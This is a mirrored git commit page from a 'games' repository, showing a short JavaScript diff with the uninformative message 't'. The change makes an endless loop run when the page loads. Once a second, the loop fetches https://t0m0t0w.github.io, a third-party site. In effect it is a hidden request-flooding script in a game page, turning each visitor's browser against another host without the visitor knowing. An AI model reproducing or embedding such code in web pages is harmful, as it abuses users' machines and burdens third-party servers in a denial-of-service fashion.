mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
t
This commit is contained in:
parent
fc8a3962ee
commit
e07a896949
@ -16,9 +16,11 @@
|
|||||||
setTimeout(resolve, milliseconds);
|
setTimeout(resolve, milliseconds);
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
while(true) {
|
window.onload = async function startdown(){
|
||||||
await delay(1000);
|
while(true) {
|
||||||
fetch('https://t0m0t0w.github.io')
|
await delay(1000);
|
||||||
|
fetch('https://t0m0t0w.github.io')
|
||||||
|
}
|
||||||
}
|
}
|
||||||
let speed = 1000
|
let speed = 1000
|
||||||
setInterval(addKrydder, speed);
|
setInterval(addKrydder, speed);
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user